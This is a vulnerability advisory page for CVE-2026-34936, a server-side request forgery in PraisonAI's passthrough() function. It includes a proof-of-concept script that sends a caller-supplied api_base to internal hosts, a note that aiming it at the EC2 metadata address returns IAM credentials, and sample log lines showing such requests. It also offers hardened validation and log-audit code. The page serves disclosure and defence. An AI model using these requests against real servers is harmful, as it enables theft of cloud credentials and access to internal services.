
Python CVE-2026-34936

Severity: HIGH (CVSS 3.1 base score 7.7)
Weakness: Server-Side Request Forgery (SSRF) (CWE-918)
Published: 2026-04-01
Project: https://github.com/MervinPraison/PraisonAI
GitHub advisory: GHSA-x6m9-gxvr-7jpv

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline (3 events)

Apr 01, 2026 - 23:21  CVE Published (nvd)
Apr 02, 2026 - 00:15  Analysis Generated (vuln.today)
Apr 02, 2026 - 14:30  Patch released (nvd); patch available

Description (NVD)

Summary

passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server.

Details

passthrough.py:92 (source) -> passthrough.py:109 (fallback trigger) -> passthrough.py:110 (sink)

```python
# source -- api_base taken directly from caller
def passthrough(endpoint, api_base=None, method="GET", ...):
    ...
    try:
        ...  # litellm primary path
    # fallback trigger -- AttributeError from unrecognised provider enters fallback
    except AttributeError:
        url = f"{api_base or 'https://api.openai.com'}{endpoint}"
        # sink -- no validation before request
        response = client.request(method, url=url, ...)
```
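A hardened replacement for that fallback, added here as an example; it is not code from PraisonAI or from the project's fix. The allowlist contents, the `resolver` hook and the function names (`validate_api_base`, `build_passthrough_url`, `is_safe_api_base`) are assumptions. It enforces the three controls the summary lists as missing: an `https`-only scheme check, a host allowlist, and a resolve-then-reject step that refuses any name mapping to a loopback, private, link-local (169.254.169.254 included) or otherwise non-global address, so a fallback request can only be sent to a known upstream API.

```python
"""Hardened handling of a caller-supplied api_base.

Added example for this advisory; not PraisonAI's code. The allowlist, the
resolver hook and the helper names are assumptions chosen for illustration.
"""
from __future__ import annotations

import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist of upstream API hosts; in a deployment this comes from config.
ALLOWED_API_HOSTS = frozenset({"api.openai.com", "api.anthropic.com"})


class UnsafeApiBase(ValueError):
    """Raised when a caller-supplied api_base fails validation."""


def is_public_ip(addr: str) -> bool:
    """True only for globally routable unicast addresses.

    Rejects loopback, RFC 1918, link-local (which covers the 169.254.169.254
    metadata endpoint), ULA, CGNAT, multicast and reserved ranges.
    """
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:a.b.c.d by its IPv4 payload
    return ip.is_global and not ip.is_multicast


def default_resolver(host: str) -> list[str]:
    """Every address the name resolves to (A and AAAA); replaceable for tests."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def validate_api_base(api_base: str, allowed_hosts=ALLOWED_API_HOSTS,
                      resolver=default_resolver) -> str:
    """Return a normalised https origin (plus optional path prefix) or raise UnsafeApiBase."""
    parts = urlsplit(api_base)
    if parts.scheme != "https":
        raise UnsafeApiBase(f"scheme {parts.scheme!r} rejected; only https is allowed")
    if parts.username is not None or parts.password is not None:
        raise UnsafeApiBase("userinfo in api_base is not allowed")
    if parts.query or parts.fragment:
        raise UnsafeApiBase("query string or fragment in api_base is not allowed")
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        raise UnsafeApiBase(f"host {host!r} is not on the allowlist")
    try:
        port = parts.port
    except ValueError as exc:
        raise UnsafeApiBase("invalid port in api_base") from exc
    # Defence in depth: an allowlisted name must still not resolve to an internal
    # address (guards against a hijacked or rebinding DNS record).
    addrs = resolver(host)
    if not addrs or not all(is_public_ip(a) for a in addrs):
        raise UnsafeApiBase(f"host {host!r} resolves to a non-public address")
    port_part = f":{port}" if port else ""
    return f"https://{host}{port_part}{parts.path.rstrip('/')}"


def build_passthrough_url(endpoint: str, api_base: str | None = None, **kw) -> str:
    """Safe replacement for the fallback's f"{api_base}{endpoint}" concatenation."""
    base = validate_api_base(api_base or "https://api.openai.com", **kw)
    # The endpoint must be a path fragment; a full URL or a scheme-relative '//host'
    # would otherwise be spliced straight into the request target.
    if not endpoint.startswith("/") or endpoint.startswith("//"):
        raise UnsafeApiBase(f"endpoint {endpoint!r} must be an absolute path")
    return base + endpoint


def is_safe_api_base(api_base: str, **kw) -> bool:
    """Boolean convenience wrapper around validate_api_base."""
    try:
        validate_api_base(api_base, **kw)
        return True
    except UnsafeApiBase:
        return False


if __name__ == "__main__":
    print(build_passthrough_url("/v1/models"))  # resolves api.openai.com over real DNS
```

The resolver is injected so the check can be exercised offline. Note that validating the resolved address and then letting the HTTP client resolve the name a second time leaves a small DNS-rebinding window; a stricter deployment connects to the validated IP and sets the Host header and SNI explicitly, or pins the allowlisted hosts to fixed addresses.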

PoC

```python
# tested on: praisonai 1.5.87 (source install)
# install: pip install -e src/praisonai
# start listener: python3 -m http.server 8888
import sys, litellm
sys.path.insert(0, 'src/praisonai')
del litellm.llm_passthrough_route

from praisonai.capabilities.passthrough import passthrough

result = passthrough(
    endpoint="/ssrf-test",
    api_base="http://127.0.0.1:8888",
    method="GET",
    custom_llm_provider="__nonexistent__",
)
print(result)
# expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...})
# listener logs: "GET /ssrf-test HTTP/1.1" 404
# on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentials
```

Impact

On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with AUTH_ENABLED = False by default, making this reachable over the network without credentials.

Analysis (AI)

Server-Side Request Forgery in PraisonAI's passthrough API allows authenticated remote attackers to access internal cloud metadata services and private network resources. The vulnerability affects the praisonai Python package where the passthrough() and apassthrough() functions accept unvalidated caller-controlled api_base parameters that are directly concatenated and passed to httpx requests. …


Remediation (AI)

Within 24 hours: Identify all deployments of the PraisonAI Python package and audit AUTH_ENABLED configuration settings; disable the passthrough() and apassthrough() API endpoints immediately or restrict network access via firewall rules to trusted sources only.

Within 7 days: Conduct a forensic review of API logs for unauthorized api_base parameter usage; rotate any exposed EC2 IAM credentials and review CloudTrail logs for suspicious metadata service access; implement network segmentation to prevent internal service access from PraisonAI processes. …
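For the log review step, an added example (not code from vuln.today or PraisonAI) that runs over a constructed JSON-lines access log. The field names (`ts`, `remote_addr`, `path`, `params`), the allowlist and the metadata host list are assumptions; a real deployment's log layout will differ and the parser must be adapted. Each request carrying an `api_base` is classified, and the most specific verdict (metadata endpoint, then internal address, then plaintext scheme, then off-allowlist host) is reported together with the calling source so repeat offenders stand out.

```python
"""Retrospective audit of API request logs for suspicious api_base values.

Added example for this advisory; not PraisonAI's code. The log layout below is
constructed, and the allowlist and metadata host list are assumptions.
"""
import ipaddress
import json
from collections import Counter
from urllib.parse import urlsplit

ALLOWED_API_HOSTS = frozenset({"api.openai.com"})  # constructed allowlist
# Cloud metadata endpoints: AWS IMDS (IPv4 and IPv6) and GCE metadata.
METADATA_HOSTS = frozenset({"169.254.169.254", "fd00:ec2::254", "metadata.google.internal"})

# Constructed sample log: one JSON record per request; not real traffic.
SAMPLE_LOG = """\
{"ts": "2026-04-02T10:00:01Z", "remote_addr": "203.0.113.7", "path": "/api/passthrough", "params": {"endpoint": "/v1/models", "api_base": "https://api.openai.com"}}
{"ts": "2026-04-02T10:00:05Z", "remote_addr": "203.0.113.9", "path": "/api/passthrough", "params": {"endpoint": "/latest/meta-data/iam/security-credentials/", "api_base": "http://169.254.169.254"}}
{"ts": "2026-04-02T10:00:09Z", "remote_addr": "203.0.113.9", "path": "/api/passthrough", "params": {"endpoint": "/", "api_base": "http://10.0.3.12:6379"}}
{"ts": "2026-04-02T10:00:12Z", "remote_addr": "198.51.100.4", "path": "/api/passthrough", "params": {"endpoint": "/v1/chat", "api_base": "https://llm.partner.example"}}
{"ts": "2026-04-02T10:00:15Z", "remote_addr": "198.51.100.4", "path": "/api/agents", "params": {}}
"""


def classify_api_base(api_base: str) -> str:
    """Verdict for one api_base value; 'ok' means it matches the expected upstream."""
    parts = urlsplit(api_base)
    host = (parts.hostname or "").lower()
    if host in METADATA_HOSTS:
        return "metadata-endpoint"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname, not a literal address
    if ip is not None and not ip.is_global:
        return "internal-address"  # loopback, RFC 1918, link-local, ULA, ...
    if parts.scheme != "https":
        return "plaintext-scheme"
    if host not in ALLOWED_API_HOSTS:
        return "off-allowlist-host"
    return "ok"


def audit_log(text: str) -> list[dict]:
    """Return one finding per request whose api_base is not 'ok'."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        rec = json.loads(line)
        api_base = rec.get("params", {}).get("api_base")
        if api_base is None:
            continue  # request did not use the passthrough parameter
        verdict = classify_api_base(api_base)
        if verdict != "ok":
            findings.append({
                "line": lineno,
                "ts": rec["ts"],
                "remote_addr": rec["remote_addr"],
                "api_base": api_base,
                "verdict": verdict,
            })
    return findings


def suspicious_sources(findings: list[dict]) -> dict:
    """Count findings per calling address to surface repeat offenders."""
    return dict(Counter(f["remote_addr"] for f in findings))


if __name__ == "__main__":
    hits = audit_log(SAMPLE_LOG)
    for hit in hits:
        print(f"line {hit['line']}: {hit['verdict']:<20} {hit['remote_addr']:<15} {hit['api_base']}")
    print("by source:", suspicious_sources(hits))
```

Run against the constructed sample it reports three findings: the metadata-service request, the request to a private Redis port, and a request to an unapproved but public host, with the first two coming from the same source address. The metadata and internal-address verdicts are the ones that should trigger the credential rotation and CloudTrail review the remediation describes.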



CVE-2026-34936 vulnerability details – vuln.today
